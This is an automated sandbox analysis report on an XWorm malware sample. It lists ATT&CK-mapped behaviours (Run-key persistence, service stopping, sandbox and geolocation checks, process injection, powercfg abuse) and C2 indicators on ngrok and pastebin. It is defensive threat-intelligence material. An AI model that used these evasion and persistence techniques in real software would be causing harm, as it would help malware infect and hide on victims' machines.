xworm | 1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\dosvc\ImagePath = "C:\\Windows\\System32\\svchost.exe -k NetworkService -p"	WaaSMedicAgent.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\UsoSvc\ImagePath = "C:\\Windows\\system32\\svchost.exe -k netsvcs -p"	WaaSMedicAgent.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	wmiprvse.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.tmp
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	RuntimeBroker.exe

Executes dropped EXE 9 IoCs

pid	Process
1116	1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.tmp
2968	1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.tmp
1436	planet.exe
4608	RuntimeBroker.exe
824	RuntimeBroker.exe
908	RuntimeBroker.exe
4320	zrtdwpgwlkoj.exe
1276	RuntimeBroker.exe
4416	RuntimeBroker.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "C:\\Windows\\RuntimeBroker.exe"	1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.tmp
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "C:\\Windows\\RuntimeBroker.exe"	1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.tmp

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs

Web Service

T1102

flow	ioc
24	4.tcp.eu.ngrok.io
36	pastebin.com
46	4.tcp.eu.ngrok.io
63	4.tcp.eu.ngrok.io
69	4.tcp.eu.ngrok.io
14	pastebin.com
15	pastebin.com
16	4.tcp.eu.ngrok.io

Power Settings 1 TTPs 8 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
3844	powercfg.exe
4380	powercfg.exe
3572	powercfg.exe
4368	powercfg.exe
4460	powercfg.exe
4040	powercfg.exe
2336	powercfg.exe
2388	powercfg.exe

Drops file in System32 directory 18 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A	OfficeClickToRun.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE
File opened for modification	C:\Windows\system32\MRT.exe	zrtdwpgwlkoj.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A	OfficeClickToRun.exe
File opened for modification	C:\Windows\system32\MRT.exe	planet.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\WindowsUpdate\Scheduled Start	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml	OfficeClickToRun.exe
File opened for modification	C:\Windows\System32\Tasks\dialersvc64	svchost.exe

Suspicious use of SetThreadContext 6 IoCs

description	pid	Process	procid_target
PID 1436 set thread context of 4768	1436	planet.exe	120
PID 4400 set thread context of 3088	4400	powershell.EXE	140
PID 4320 set thread context of 4452	4320	zrtdwpgwlkoj.exe	158
PID 4320 set thread context of 4728	4320	zrtdwpgwlkoj.exe	162
PID 4320 set thread context of 3572	4320	zrtdwpgwlkoj.exe	164
PID 4988 set thread context of 4608	4988	powershell.EXE	167

Drops file in Windows directory 8 IoCs

description	ioc	Process
File created	C:\Windows\is-OQ09T.tmp	1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.tmp
File created	C:\Windows\is-ONBEH.tmp	1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.tmp
File opened for modification	C:\Windows\unins000.dat	1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.tmp
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk	svchost.exe
File opened for modification	C:\Windows\planet.exe	1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.tmp
File opened for modification	C:\Windows\RuntimeBroker.exe	1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.tmp
File created	C:\Windows\unins000.dat	1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.tmp
File created	C:\Windows\is-NLRLL.tmp	1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.tmp

Launches sc.exe 14 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4328	sc.exe
5024	sc.exe
2964	sc.exe
1660	sc.exe
4368	sc.exe
3200	sc.exe
3028	sc.exe
3656	sc.exe
832	sc.exe
3444	sc.exe
4452	sc.exe
1680	sc.exe
3224	sc.exe
1376	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.tmp

Checks SCSI registry key(s) 3 TTPs 18 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\LogConf	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID	wmiprvse.exe

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key security queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	wmiprvse.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1732220533"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	dialer.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={190ECAB3-FDB0-48D9-90A2-083C27695B48}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&"	OfficeClickToRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	dialer.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
3124	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
824	RuntimeBroker.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2968	1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.tmp
2968	1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.tmp
4300	powershell.exe
4300	powershell.exe
1200	powershell.exe
1200	powershell.exe
4876	powershell.exe
4876	powershell.exe
1436	planet.exe
2000	powershell.exe
2000	powershell.exe
1436	planet.exe
1436	planet.exe
1436	planet.exe
1436	planet.exe
1436	planet.exe
1436	planet.exe
1436	planet.exe
1436	planet.exe
1436	planet.exe
1436	planet.exe
1436	planet.exe
1436	planet.exe
1436	planet.exe
1436	planet.exe
1436	planet.exe
4320	zrtdwpgwlkoj.exe
4400	powershell.EXE
972	powershell.exe
972	powershell.exe
4400	powershell.EXE
4400	powershell.EXE
3088	dllhost.exe
3088	dllhost.exe
3088	dllhost.exe
3088	dllhost.exe
4320	zrtdwpgwlkoj.exe
4320	zrtdwpgwlkoj.exe
4320	zrtdwpgwlkoj.exe
4320	zrtdwpgwlkoj.exe
4320	zrtdwpgwlkoj.exe
4320	zrtdwpgwlkoj.exe
4320	zrtdwpgwlkoj.exe
4320	zrtdwpgwlkoj.exe
4320	zrtdwpgwlkoj.exe
4320	zrtdwpgwlkoj.exe
4320	zrtdwpgwlkoj.exe
4320	zrtdwpgwlkoj.exe
4320	zrtdwpgwlkoj.exe
4988	powershell.EXE
3088	dllhost.exe
3088	dllhost.exe
4988	powershell.EXE
3088	dllhost.exe
3088	dllhost.exe
3088	dllhost.exe
3088	dllhost.exe
3088	dllhost.exe
3088	dllhost.exe
3088	dllhost.exe
3088	dllhost.exe
4988	powershell.EXE
3088	dllhost.exe
3088	dllhost.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4608	RuntimeBroker.exe
Token: SeDebugPrivilege	824	RuntimeBroker.exe
Token: SeDebugPrivilege	4300	powershell.exe
Token: SeDebugPrivilege	1200	powershell.exe
Token: SeDebugPrivilege	4876	powershell.exe
Token: SeDebugPrivilege	908	RuntimeBroker.exe
Token: SeDebugPrivilege	2000	powershell.exe
Token: SeShutdownPrivilege	4380	powercfg.exe
Token: SeCreatePagefilePrivilege	4380	powercfg.exe
Token: SeShutdownPrivilege	4460	powercfg.exe
Token: SeCreatePagefilePrivilege	4460	powercfg.exe
Token: SeShutdownPrivilege	3572	powercfg.exe
Token: SeCreatePagefilePrivilege	3572	powercfg.exe
Token: SeShutdownPrivilege	4368	powercfg.exe
Token: SeCreatePagefilePrivilege	4368	powercfg.exe
Token: SeDebugPrivilege	4400	powershell.EXE
Token: SeDebugPrivilege	972	powershell.exe
Token: SeDebugPrivilege	4400	powershell.EXE
Token: SeDebugPrivilege	3088	dllhost.exe
Token: SeShutdownPrivilege	2388	powercfg.exe
Token: SeCreatePagefilePrivilege	2388	powercfg.exe
Token: SeShutdownPrivilege	4040	powercfg.exe
Token: SeCreatePagefilePrivilege	4040	powercfg.exe
Token: SeShutdownPrivilege	2336	powercfg.exe
Token: SeCreatePagefilePrivilege	2336	powercfg.exe
Token: SeShutdownPrivilege	3844	powercfg.exe
Token: SeCreatePagefilePrivilege	3844	powercfg.exe
Token: SeLockMemoryPrivilege	3572	dialer.exe
Token: SeDebugPrivilege	4988	powershell.EXE
Token: SeAssignPrimaryTokenPrivilege	2284	svchost.exe
Token: SeIncreaseQuotaPrivilege	2284	svchost.exe
Token: SeSecurityPrivilege	2284	svchost.exe
Token: SeTakeOwnershipPrivilege	2284	svchost.exe
Token: SeLoadDriverPrivilege	2284	svchost.exe
Token: SeSystemtimePrivilege	2284	svchost.exe
Token: SeBackupPrivilege	2284	svchost.exe
Token: SeRestorePrivilege	2284	svchost.exe
Token: SeShutdownPrivilege	2284	svchost.exe
Token: SeSystemEnvironmentPrivilege	2284	svchost.exe
Token: SeUndockPrivilege	2284	svchost.exe
Token: SeManageVolumePrivilege	2284	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2284	svchost.exe
Token: SeIncreaseQuotaPrivilege	2284	svchost.exe
Token: SeSecurityPrivilege	2284	svchost.exe
Token: SeTakeOwnershipPrivilege	2284	svchost.exe
Token: SeLoadDriverPrivilege	2284	svchost.exe
Token: SeSystemtimePrivilege	2284	svchost.exe
Token: SeBackupPrivilege	2284	svchost.exe
Token: SeRestorePrivilege	2284	svchost.exe
Token: SeShutdownPrivilege	2284	svchost.exe
Token: SeSystemEnvironmentPrivilege	2284	svchost.exe
Token: SeUndockPrivilege	2284	svchost.exe
Token: SeManageVolumePrivilege	2284	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2284	svchost.exe
Token: SeIncreaseQuotaPrivilege	2284	svchost.exe
Token: SeSecurityPrivilege	2284	svchost.exe
Token: SeTakeOwnershipPrivilege	2284	svchost.exe
Token: SeLoadDriverPrivilege	2284	svchost.exe
Token: SeSystemtimePrivilege	2284	svchost.exe
Token: SeBackupPrivilege	2284	svchost.exe
Token: SeRestorePrivilege	2284	svchost.exe
Token: SeShutdownPrivilege	2284	svchost.exe
Token: SeSystemEnvironmentPrivilege	2284	svchost.exe
Token: SeUndockPrivilege	2284	svchost.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2968	1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.tmp

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4964 wrote to memory of 1116	4964	1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.exe	82
PID 4964 wrote to memory of 1116	4964	1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.exe	82
PID 4964 wrote to memory of 1116	4964	1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.exe	82
PID 1116 wrote to memory of 4600	1116	1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.tmp	83
PID 1116 wrote to memory of 4600	1116	1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.tmp	83
PID 1116 wrote to memory of 4600	1116	1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.tmp	83
PID 4600 wrote to memory of 2968	4600	1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.exe	84
PID 4600 wrote to memory of 2968	4600	1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.exe	84
PID 4600 wrote to memory of 2968	4600	1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.exe	84
PID 2968 wrote to memory of 1436	2968	1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.tmp	85
PID 2968 wrote to memory of 1436	2968	1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.tmp	85
PID 2968 wrote to memory of 824	2968	1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.tmp	86
